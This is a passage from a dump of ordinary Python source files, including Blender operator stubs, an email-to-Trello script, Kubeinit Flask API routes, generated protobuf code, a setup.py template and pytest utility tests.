vert_connect_nonplanar(angle_limit: float = 0.0872665):\n '''Split non-planar faces that exceed the angle threshold \n\n :param angle_limit: Max Angle, Angle limit \n :type angle_limit: float\n '''\n\n pass\n\n\ndef vert_connect_path():\n '''Connect vertices by their selection order, creating edges, splitting faces \n\n '''\n\n pass\n\n\ndef vertex_color_add():\n '''Add vertex color layer \n\n '''\n\n pass\n\n\ndef vertex_color_remove():\n '''Remove vertex color layer \n\n '''\n\n pass\n\n\ndef vertices_smooth(factor: float = 0.5,\n repeat: int = 1,\n xaxis: bool = True,\n yaxis: bool = True,\n zaxis: bool = True):\n '''Flatten angles of selected vertices \n\n :param factor: Smoothing, Smoothing factor \n :type factor: float\n :param repeat: Repeat, Number of times to smooth the mesh \n :type repeat: int\n :param xaxis: X-Axis, Smooth along the X axis \n :type xaxis: bool\n :param yaxis: Y-Axis, Smooth along the Y axis \n :type yaxis: bool\n :param zaxis: Z-Axis, Smooth along the Z axis \n :type zaxis: bool\n '''\n\n pass\n\n\ndef vertices_smooth_laplacian(repeat: int = 1,\n lambda_factor: float = 1.0,\n lambda_border: float = 5e-05,\n use_x: bool = True,\n use_y: bool = True,\n use_z: bool = True,\n preserve_volume: bool = True):\n '''Laplacian smooth of selected vertices \n\n :param repeat: Number of iterations to smooth the mesh \n :type repeat: int\n :param lambda_factor: Lambda factor \n :type lambda_factor: float\n :param lambda_border: Lambda factor in border \n :type lambda_border: float\n :param use_x: Smooth X Axis, Smooth object along X axis \n :type use_x: bool\n :param use_y: Smooth Y Axis, Smooth object along Y axis \n :type use_y: bool\n :param use_z: Smooth Z Axis, Smooth object along Z axis \n :type use_z: bool\n :param preserve_volume: Preserve Volume, Apply volume preservation after smooth \n :type preserve_volume: bool\n '''\n\n pass\n\n\ndef wireframe(use_boundary: bool = True,\n use_even_offset: bool = True,\n use_relative_offset: bool = False,\n use_replace: bool = True,\n thickness: float = 0.01,\n offset: float = 0.01,\n use_crease: bool = False,\n crease_weight: float = 0.01):\n '''Create a solid wire-frame from faces \n\n :param use_boundary: Boundary, Inset face boundaries \n :type use_boundary: bool\n :param use_even_offset: Offset Even, Scale the offset to give more even thickness \n :type use_even_offset: bool\n :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry \n :type use_relative_offset: bool\n :param use_replace: Replace, Remove original faces \n :type use_replace: bool\n :param thickness: Thickness \n :type thickness: float\n :param offset: Offset \n :type offset: float\n :param use_crease: Crease, Crease hub edges for improved subsurf \n :type use_crease: bool\n :param crease_weight: Crease weight \n :type crease_weight: float\n '''\n\n pass\n"} {"ext": "py", "sha": "1a304933cb80e62027c2631ddc0202f5385045a8", "content": "from imbox import Imbox\nimport html2text\nimport requests\nimport json\nimport time\n\nwith open('config.json') as config_file:\n data = json.load(config_file)\n\nAPI_KEY = data['API_KEY']\nOAUTH_TOKEN = data['OAUTH_TOKEN']\ntrello_list_id = data['trello_list_id']\n\n# SSL Context docs https://docs.python.org/3/library/ssl.html#ssl.create_default_context\n\ndef get_text(content):\n html = (str(content))\n\n text_maker = html2text.HTML2Text()\n text_maker.ignore_links = True\n text_maker.bypass_tables = False\n \n\n text = text_maker.handle(html)\n\n # Slice everything that comes between html': and 
]}\n start = \"html':\"\n end = \"]}\"\n mail_content = text[text.find(start) + len(start):text.rfind(end)]\n \n # Normalize content, removing unknown chars\n mail_content = mail_content.replace(\"['\",\"\")\n mail_content = mail_content.replace('\\\\xa0', ' ')\n mail_content = mail_content.replace(\"\\\\r\\\\n'\",\"\")\n \n return mail_content\n\n\ndef send_to_trello(mail_content,subject): \n \n r = requests.post(\"https://api.trello.com/1/cards?key=\" + \\\n API_KEY + \"&token=\" + OAUTH_TOKEN + \\\n \"&name=\" + subject + \"&idList=\" + \\\n trello_list_id + \"&desc=\" + \\\n mail_content)\n\n return r\n \nwith Imbox('imap.gmail.com',\n username = data['mail_username'],\n password = data['mail_password'],\n ssl = True,\n ssl_context = None,\n starttls = False) as imbox:\n\n fetch_mail_type = imbox.messages(sent_from = data['mail_from_username'])\n\n # Get all folders\n #status, folders_with_additional_info = imbox.folders()\n\n # Gets all messages from the inbox\n #all_inbox_messages = imbox.messages()\n\n for uid, message in fetch_mail_type:\n # Every message is an object with the following keys\n\n origin = message.sent_from\n receiver = message.sent_to\n subject = message.subject\n headers = message.headers\n message_id = message.message_id\n message_date = message.date\n content = message.body\n message_attachments = message.attachments\n\n result = get_text(content)\n response = send_to_trello(result,subject)\n \n if response.status_code == 200:\n #imbox.mark_seen(uid)\n imbox.delete(uid)\n\n\n time.sleep(1)"} {"ext": "py", "sha": "1a304b706f06264e84f92dd35e7e8243b8a98c9c", "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright 2019 Kubeinit (kubeinit.com).\n\nLicensed under the Apache License, Version 2.0 (the \"License\"); you may\nnot use this file except in compliance with the License. You may obtain\na copy of the License at:\n\nhttp://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\nWARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\nLicense for the specific language governing permissions and limitations\nunder the License.\n\"\"\"\n\nimport app\nfrom app import version as kubeinit_ui_version\nfrom app.base import blueprint\nfrom app.base.k8sclient import (cluster_name_configured,\n state_namespaces,\n state_nodes,\n state_pods,\n web_terminal)\n\nfrom flask import jsonify, redirect, render_template, request, url_for\n# , session\n\n# from flask_login import (current_user,\n# login_required,\n# login_user,\n# logout_user)\n\nfrom google.cloud import firestore\n\nfrom pystol.lister import list_actions, show_actions\n\nKUBEINIT_VERSION = kubeinit_ui_version.__version__\n\n#\n# Begin authentication\n#\ntry:\n from app.auth.routes import get_session_data\n# from app.auth.util import remote_cluster\nexcept ImportError:\n print(\"Module not available\")\n\ntry:\n fdb = firestore.Client()\n transaction = fdb.transaction()\nexcept Exception as e:\n print(\"Cant connect to firestore: %s\" % (e))\n#\n# End authentication\n#\n\n\n@blueprint.route('/error-<error>')\ndef route_errors(error):\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return render_template('errors/{}.html'.format(error))\n\n\n# API endpoints\n@blueprint.route('/api/v1/ListActions', methods=['GET'])\ndef api_list_actions():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(list_actions())\n\n\n@blueprint.route('/api/v1/ShowActions', methods=['GET'])\ndef api_show_actions():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(show_actions())\n\n\n@blueprint.route('/api/v1/StateNamespaces', methods=['GET'])\ndef api_state_namespaces():\n \"\"\"\n Define a route.\n\n This 
is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(state_namespaces())\n\n\n@blueprint.route('/api/v1/StateNodes', methods=['GET'])\ndef api_state_nodes():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(state_nodes())\n\n\n@blueprint.route('/api/v1/StatePods', methods=['GET'])\ndef api_state_pods():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(state_pods())\n\n\n@blueprint.route('/api/v1/Terminal', methods=['GET'])\ndef api_web_terminal():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(web_terminal())\n\n\n@blueprint.route('/api/v1/ClusterName', methods=['GET'])\ndef api_cluster_name_configured():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n #\n # Basic authentication module requirement\n # If the auth module is installed and the user is not authenticated, so go to login\n #\n session = {}\n if hasattr(app, 'auth'):\n try:\n session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id'))\n except Exception as e:\n 
print(e)\n return redirect(url_for('auth_blueprint.login'))\n else:\n session['kubeconfig'] = None\n # not current_user.is_authenticated:\n if hasattr(app, 'auth') and session['email'] is None:\n return redirect(url_for('auth_blueprint.login'))\n #\n # End basic authentication requirement\n #\n\n return jsonify(cluster_name_configured())\n\n\n@blueprint.route('/shutdown')\ndef shutdown():\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n func = request.environ.get('werkzeug.server.shutdown')\n if func is None:\n raise RuntimeError('Not running with the Werkzeug Server')\n func()\n return 'Server shutting down...'\n\n\n@blueprint.errorhandler(404)\ndef not_found_error(error):\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n return render_template('page-404.html',\n template_folder=\"../home/templates/\"), 404\n\n\n@blueprint.errorhandler(500)\ndef internal_error(error):\n \"\"\"\n Define a route.\n\n This is a main routing method\n \"\"\"\n return render_template('page-500.html',\n template_folder=\"../home/templates/\"), 500\n\n# Errors\n# @login_manager.unauthorized_handler\n# def unauthorized_handler():\n# \"\"\"\n# Define a route.\n#\n# This is a main routing method\n# \"\"\"\n# return render_template('page-403.html',\n# template_folder=\"../home/templates/\"), 403\n\n\n# @blueprint.errorhandler(403)\n# def access_forbidden(error):\n# \"\"\"\n# Define a route.\n#\n# This is a main routing method\n# \"\"\"\n# return render_template('page-403.html',\n# template_folder=\"../home/templates/\"), 403\n"} {"ext": "py", "sha": "1a304b8753c7704f6723bc771a077928405b2e89", "content": "# Generated by the protocol buffer compiler. DO NOT EDIT!\r\n# source: communicator_objects/brain_type_proto.proto\r\n\r\nimport sys\r\n_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))\r\nfrom google.protobuf.internal import enum_type_wrapper\r\nfrom google.protobuf import descriptor as _descriptor\r\nfrom google.protobuf import message as _message\r\nfrom google.protobuf import reflection as _reflection\r\nfrom google.protobuf import symbol_database as _symbol_database\r\nfrom google.protobuf import descriptor_pb2\r\n# @@protoc_insertion_point(imports)\r\n\r\n_sym_db = _symbol_database.Default()\r\n\r\n\r\n#from communicator_objects import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2\r\n\r\nimport resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2\r\n\r\n\r\nDESCRIPTOR = _descriptor.FileDescriptor(\r\n name='communicator_objects/brain_type_proto.proto',\r\n package='communicator_objects',\r\n syntax='proto3',\r\n serialized_pb=_b('\\n+communicator_objects/brain_type_proto.proto\\x12\\x14\\x63ommunicator_objects\\x1a+communicator_objects/resolution_proto.proto*G\\n\\x0e\\x42rainTypeProto\\x12\\n\\n\\x06Player\\x10\\x00\\x12\\r\\n\\tHeuristic\\x10\\x01\\x12\\x0c\\n\\x08\\x45xternal\\x10\\x02\\x12\\x0c\\n\\x08Internal\\x10\\x03\\x42\\x1f\\xaa\\x02\\x1cMLAgents.CommunicatorObjectsb\\x06proto3')\r\n ,\r\n dependencies=[communicator__objects_dot_resolution__proto__pb2.DESCRIPTOR,])\r\n\r\n_BRAINTYPEPROTO = _descriptor.EnumDescriptor(\r\n name='BrainTypeProto',\r\n full_name='communicator_objects.BrainTypeProto',\r\n filename=None,\r\n file=DESCRIPTOR,\r\n values=[\r\n _descriptor.EnumValueDescriptor(\r\n name='Player', index=0, number=0,\r\n options=None,\r\n type=None),\r\n _descriptor.EnumValueDescriptor(\r\n name='Heuristic', index=1, number=1,\r\n options=None,\r\n type=None),\r\n 
_descriptor.EnumValueDescriptor(\r\n name='External', index=2, number=2,\r\n options=None,\r\n type=None),\r\n _descriptor.EnumValueDescriptor(\r\n name='Internal', index=3, number=3,\r\n options=None,\r\n type=None),\r\n ],\r\n containing_type=None,\r\n options=None,\r\n serialized_start=114,\r\n serialized_end=185,\r\n)\r\n_sym_db.RegisterEnumDescriptor(_BRAINTYPEPROTO)\r\n\r\nBrainTypeProto = enum_type_wrapper.EnumTypeWrapper(_BRAINTYPEPROTO)\r\nPlayer = 0\r\nHeuristic = 1\r\nExternal = 2\r\nInternal = 3\r\n\r\n\r\nDESCRIPTOR.enum_types_by_name['BrainTypeProto'] = _BRAINTYPEPROTO\r\n_sym_db.RegisterFileDescriptor(DESCRIPTOR)\r\n\r\n\r\nDESCRIPTOR.has_options = True\r\nDESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\\252\\002\\034MLAgents.CommunicatorObjects'))\r\n# @@protoc_insertion_point(module_scope)\r\n"} {"ext": "py", "sha": "1a304bb060903a5cd94b0ffd2af2c9cfbca5e79b", "content": "import pylab\n\n\nclass Animal:\n def __init__(self, name, egg_laying, scales, poisonous, cold_blood, legs, reptile):\n self.name = name\n self.egg_laying = egg_laying\n self.scales = scales\n self.poisonous = poisonous\n self.legs = legs\n self.cold_blood = cold_blood\n self.reptile = reptile\n\n def get_name(self):\n return self.name\n\n def distance(self, another_animal):\n distance = 0\n if self.egg_laying != another_animal.egg_laying:\n distance += 1\n if self.scales != another_animal.scales:\n distance += 1\n if self.poisonous != another_animal.poisonous:\n distance += 1\n if self.legs != another_animal.legs:\n distance += 1\n if self.cold_blood != another_animal.cold_blood:\n distance += 1\n if self.reptile != another_animal.reptile:\n distance += 1\n\n return distance\n\n def __str__(self):\n return self.name\n\n\ndef std_dev(l):\n if len(l) == 0:\n return float('NaN')\n\n summ = 0\n for i in l:\n summ += len(i)\n\n mean = summ / float(len(l))\n tot = 0.0\n for i in l:\n tot += (len(i) - mean) ** 2\n\n std = (tot / len(l)) ** 0.5\n return std\n\n\ndef z_scale_features(vals):\n result = pylab.array(vals)\n mean = float(sum(vals)) / len(vals)\n result = result - mean\n return result / std_dev(result)\n\n\ndef i_scale_features(vals):\n min_vals, max_vals = min(vals), max(vals)\n fit = pylab.polyfit([min_vals, max_vals], [0, 1], 1)\n return pylab.polyval(fit, vals)\n\n\nanimals = [Animal('cobra', 1, 1, 1, 1, 0, 1),\n Animal('rattlesnake', 1, 1, 1, 1, 0, 1),\n Animal('boa constrictor', 0, 1, 0, 1, 0, 1),\n Animal('chicken', 1, 1, 0, 1, 2, 0),\n Animal('guppy', 0, 1, 0, 0, 0, 0),\n Animal('dart frog', 1, 0, 1, 0, 4, 0),\n Animal('zebra', 0, 0, 0, 0, 4, 0),\n Animal('python', 1, 1, 0, 1, 0, 1),\n Animal('alligator', 1, 1, 0, 1, 4, 1)]\n\n\ndef distance_matrix(animals, precision):\n column_label = []\n for a in animals:\n column_label.append(a.get_name())\n row_label = column_label[:]\n table_vals = []\n\n # Get distance between pairs of animals\n for a1 in animals:\n row = []\n for a2 in animals:\n if a1 == a2:\n row.append('--')\n else:\n distance = a1.distance(a2)\n row.append(str(round(distance, precision)))\n table_vals.append(row)\n\n table = pylab.table(rowLabels=row_label,\n colLabels=column_label,\n cellText=table_vals,\n cellLoc='center',\n loc='center',\n colWidths=[0.138] * len(animals))\n table.scale(1, 2.5)\n pylab.axis('off')\n pylab.savefig('distance')\n\n\ndistance_matrix(animals, 3)\n"} {"ext": "py", "sha": "1a304c94f9d33523058aa89133e995522e180368", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Note: To use the 'upload' functionality 
of this file, you must:\n# $ pipenv install twine --dev\n\nimport io\nimport os\nimport sys\nfrom shutil import rmtree\n\nfrom setuptools import find_packages, setup, Command\n\n# Package meta-data.\nNAME = 'mypackage'\nDESCRIPTION = 'My short description for my project.'\nURL = 'https://github.com/me/myproject'\nEMAIL = 'me@example.com'\nAUTHOR = 'Awesome Soul'\nREQUIRES_PYTHON = '>=3.8.0'\nVERSION = '0.1.0'\n\n# What packages are required for this module to be executed?\nREQUIRED = [\n # 'requests', 'maya', 'records',\n]\n\n# What packages are optional?\nEXTRAS = {\n # 'fancy feature': ['django'],\n}\n\n# The rest you shouldn't have to touch too much :)\n# ------------------------------------------------\n# Except, perhaps the License and Trove Classifiers!\n# If you do change the License, remember to change the Trove Classifier for that!\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Import the README and use it as the long-description.\n# Note: this will only work if 'README.md' is present in your MANIFEST.in file!\ntry:\n with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\nexcept FileNotFoundError:\n long_description = DESCRIPTION\n\n# Load the package's __version__.py module as a dictionary.\nabout = {}\nif not VERSION:\n project_slug = NAME.lower().replace(\"-\", \"_\").replace(\" \", \"_\")\n with open(os.path.join(here, project_slug, '__version__.py')) as f:\n exec(f.read(), about)\nelse:\n about['__version__'] = VERSION\n\n\nclass UploadCommand(Command):\n \"\"\"Support setup.py upload.\"\"\"\n\n description = 'Build and publish the package.'\n user_options = []\n\n @staticmethod\n def status(s):\n \"\"\"Prints things in bold.\"\"\"\n print('\\033[1m{0}\\033[0m'.format(s))\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n try:\n self.status('Removing previous builds…')\n rmtree(os.path.join(here, 'dist'))\n except OSError:\n pass\n\n self.status('Building Source and Wheel (universal) distribution…')\n os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))\n\n self.status('Uploading the package to PyPI via Twine…')\n os.system('twine upload dist/*')\n\n self.status('Pushing git tags…')\n os.system('git tag v{0}'.format(about['__version__']))\n os.system('git push --tags')\n\n sys.exit()\n\n\n# Where the magic happens:\nsetup(\n name=NAME,\n version=about['__version__'],\n description=DESCRIPTION,\n long_description=long_description,\n long_description_content_type='text/markdown',\n author=AUTHOR,\n author_email=EMAIL,\n python_requires=REQUIRES_PYTHON,\n url=URL,\n packages=find_packages(exclude=[\"tests\", \"*.tests\", \"*.tests.*\", \"tests.*\"]),\n # If your package is a single module, use this instead of 'packages':\n # py_modules=['mypackage'],\n\n # entry_points={\n # 'console_scripts': ['mycli=mymodule:cli'],\n # },\n install_requires=REQUIRED,\n extras_require=EXTRAS,\n include_package_data=True,\n license='MIT',\n classifiers=[\n # Trove classifiers\n # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: Implementation :: CPython',\n 'Programming Language :: Python :: Implementation :: PyPy'\n ],\n # $ setup.py publish support.\n cmdclass={\n 'upload': UploadCommand,\n },\n)\n"} {"ext": "py", "sha": 
"1a304d958c1bf8226f9dfa8a1c718239de92b0d2", "content": "class ResampleQuality:\n r\"\"\"Quality levels for resampling.\"\"\"\n QUICK = 'q'\n LOW = 'l'\n MEDIUM = 'm'\n HIGH = 'h'\n VERY_HIGH = 'v'\n"} {"ext": "py", "sha": "1a304d961a3e03a6460d3f21abd9d9ba9cbc8ecf", "content": "#!/usr/bin/env python3\n\nimport pytest # type: ignore\nimport os\nimport time\nimport random\nimport pathlib\nimport numpy as np # type: ignore\nimport numpy\nfrom glob import iglob\nfrom pathlib import Path\nimport rtCommon.utils as utils # type: ignore\nimport rtCommon.projectUtils as putils # type: ignore\nimport rtCommon.validationUtils as vutils # type: ignore\nfrom rtCommon.structDict import MatlabStructDict # type: ignore\nfrom rtCommon.addLogin import addUserPassword\nfrom rtCommon.webHttpHandlers import loadPasswdFile\n\n\n@pytest.fixture(scope=\"module\")\ndef matTestFilename(): # type: ignore\n return os.path.join(os.path.dirname(__file__), 'test_input/teststruct.mat')\n\n\nclass TestFindNewestFile:\n TEST_BASE_FILENAME = '/tmp/testdir/file1_20170101T01010'\n NUM_TEST_FILES = 5\n\n def setup_class(cls):\n # create tmp directory if it doesn't exist\n pathlib.Path('/tmp/testdir/').mkdir(parents=True, exist_ok=True)\n # check if test files already exist, get the count of them\n count_testfiles = sum(1 for _ in iglob(TestFindNewestFile.TEST_BASE_FILENAME + \"*\"))\n if count_testfiles != TestFindNewestFile.NUM_TEST_FILES:\n # remove any existing testfiles\n for filename in iglob(TestFindNewestFile.TEST_BASE_FILENAME + \"*\"):\n os.remove(filename)\n # create the correct number of test files\n for i in range(TestFindNewestFile.NUM_TEST_FILES):\n filename = TestFindNewestFile.TEST_BASE_FILENAME + str(i)\n with open(filename, 'w') as fp:\n fp.write(\"test file\")\n time.sleep(1)\n\n def assert_result_matches_filename(self, filename):\n assert filename == (self.TEST_BASE_FILENAME + str(self.NUM_TEST_FILES - 1))\n\n def test_normalCase(self):\n print(\"Test findNewestFile normal case:\")\n filename = utils.findNewestFile('/tmp/testdir', 'file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_emptyPath(self):\n print(\"Test findNewestFile empty path:\")\n filename = utils.findNewestFile('', '/tmp/testdir/file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_pathInPattern(self):\n print(\"Test findNewestFile path embedded in pattern:\")\n filename = utils.findNewestFile(\n '/tmp/testdir', '/tmp/testdir/file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_pathPartiallyInPattern(self):\n print(\"Test findNewestFile path partially in pattern:\")\n filename = utils.findNewestFile('/tmp', 'testdir/file1_20170101*')\n self.assert_result_matches_filename(filename)\n\n def test_noMatchingFiles(self):\n print(\"Test findNewestFile no matching files:\")\n filename = utils.findNewestFile('/tmp/testdir/', 'no_such_file')\n assert filename is None\n\n\nclass TestCompareArrays:\n A = None\n B = None\n max_deviation = .01\n\n def setup_class(cls):\n arrayDims = [40, 50, 60]\n A = np.random.random(arrayDims)\n delta = np.random.random(arrayDims) * TestCompareArrays.max_deviation\n B = A + (A * delta)\n TestCompareArrays.A = A\n TestCompareArrays.B = B\n\n def test_compareArrays(self):\n print(\"Test compareArrays\")\n # import pdb; pdb.set_trace()\n result = vutils.compareArrays(self.B, self.A)\n assert result['mean'] < 2 / 3 * self.max_deviation\n assert result['max'] < self.max_deviation\n return\n\n def test_areArraysClose(self):\n print(\"Test 
areArraysClose\")\n max_mean = 2 / 3 * self.max_deviation\n assert vutils.areArraysClose(self.B, self.A, mean_limit=max_mean)\n return\n\n\nclass TestCompareMatStructs:\n A = None\n B = None\n max_deviation = .01\n\n def setup_class(cls):\n def delta(val):\n return val + (val * random.random() * TestCompareMatStructs.max_deviation)\n A = MatlabStructDict(\n {'sub': MatlabStructDict({})}, 'sub')\n A.str1 = \"hello\"\n A.a1 = 6.0\n A.sub.a2 = np.array([1, 2, 3, 4, 5], dtype=np.float)\n A.sub.b2 = 7.0\n A.sub.str2 = \"world\"\n B = MatlabStructDict(\n {'sub': MatlabStructDict({})}, 'sub')\n B.str1 = \"hello\"\n B.a1 = delta(A.a1)\n B.sub.a2 = delta(A.a2)\n B.sub.b2 = delta(A.b2)\n B.sub.str2 = \"world\"\n TestCompareMatStructs.A = A\n TestCompareMatStructs.B = B\n\n def test_compareMatStructs_all_fields(self):\n print(\"Test compareMatStructs_all_fields\")\n result = vutils.compareMatStructs(self.A, self.B)\n means = [result[key]['mean'] for key in result.keys()]\n assert len(means) == 5\n assert all(mean < self.max_deviation for mean in means)\n\n def test_compareMatStructs_field_subset(self):\n print(\"Test compareMatStructs_field_subset\")\n result = vutils.compareMatStructs(self.A, self.B, ['a2', 'str1'])\n means = [result[key]['mean'] for key in result.keys()]\n assert len(means) == 2\n assert all(mean < self.max_deviation for mean in means)\n\n def test_isMeanWithinThreshold(self):\n a = {'val1': {'mean': .1, 'max': .2},\n 'val2': {'mean': .05, 'max': .075}}\n assert vutils.isMeanWithinThreshold(a, .11)\n assert not vutils.isMeanWithinThreshold(a, .09)\n\n\nclass TestValidationUtils:\n def test_compareMatFiles(self, matTestFilename):\n res = vutils.compareMatFiles(matTestFilename, matTestFilename)\n assert vutils.isMeanWithinThreshold(res, 0)\n\n def test_pearsonsMeanCorr(self):\n n1 = np.array([[1, 2, 3, 4, 5],\n [np.nan, np.nan, np.nan, np.nan, np.nan]])\n n2 = np.array([[1.1, 2.1, 3.2, 4.1, 5.05],\n [np.nan, np.nan, np.nan, np.nan, np.nan]])\n n1t = np.transpose(n1)\n n2t = np.transpose(n2)\n res = vutils.pearsons_mean_corr(n1t, n2t)\n assert res > 0.999\n\nclass TestUtils:\n def test_delete(self):\n fileList = ['/tmp/testdir/d1/test1.txt', '/tmp/testdir/d1/d2/test2.txt',\n '/tmp/testdir/d1/d2/d3/test3.txt', '/tmp/testdir/d1/d2/d3/test4.txt']\n for file in fileList:\n utils.writeFile(file, 'hello', binary=False)\n\n # test delete files from list\n assert os.path.exists(fileList[-1])\n utils.deleteFilesFromList(fileList)\n assert not os.path.exists(fileList[-1])\n assert os.path.isdir('/tmp/testdir/d1/d2/d3')\n\n # test delete folder\n for file in fileList:\n utils.writeFile(file, 'hello', binary=False)\n utils.deleteFolder('/tmp/testdir/d1')\n assert not os.path.isdir('/tmp/testdir/d1')\n\n # test delete files recursively in folders, but leave folders in place\n for file in fileList:\n utils.writeFile(file, 'hello', binary=False)\n utils.deleteFolderFiles('/tmp/testdir/d1')\n assert os.path.isdir('/tmp/testdir/d1/d2/d3')\n\nclass TestAddUser:\n def test_adduser(self):\n testPasswordFile = '/tmp/testdir/test_pwd_file'\n # start with empty file\n if os.path.exists(testPasswordFile):\n os.remove(testPasswordFile)\n addUserPassword('a_user', 'a_password', testPasswordFile, retypePasswd=False)\n addUserPassword('b_user', 'b_password', testPasswordFile, retypePasswd=False)\n pwds = loadPasswdFile(testPasswordFile)\n assert 'a_user' in pwds\n assert 'b_user' in pwds\n\nclass TestProjectUtils:\n def test_npToPy(self):\n data1 = {'subject': '04', 'task': 'story', 'suffix': 'bold', 'datatype': 
'func', 'run': 1}\n data2 = {'a1': (1, 'two', 3.0),\n 'a2': {'np': numpy.float32(3), 'pyint': 4, 'str': 'five'},\n 'a3': [6.0, 'seven', numpy.int(8), {'a', numpy.float32(5), 'c'}]}\n data2_py = {'a1': (1, 'two', 3.0),\n 'a2': {'np': 3.0, 'pyint': 4, 'str': 'five'},\n 'a3': [6.0, 'seven', 8.0, {'a', 5.0, 'c'}]}\n kwargs = {'mdata': data2, 'test1': 9.0, 'test2': numpy.float32(9), 'test3': 'yes'}\n kwargs_py = {'mdata': data2_py, 'test1': 9.0, 'test2': 9.0, 'test3': 'yes'}\n args = (4, 'hello', data1, kwargs)\n args_py = (4, 'hello', data1, kwargs_py)\n res = putils.npToPy(args)\n assert res == args_py\n\n\nif __name__ == \"__main__\":\n print(\"PYTEST MAIN:\")\n pytest.main()\n"} {"ext": "py", "sha": "1a304e1024ad069dcf72a7729caa76ee2217ce61", "content": "# coding=utf-8\n# Copyright 2021 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT 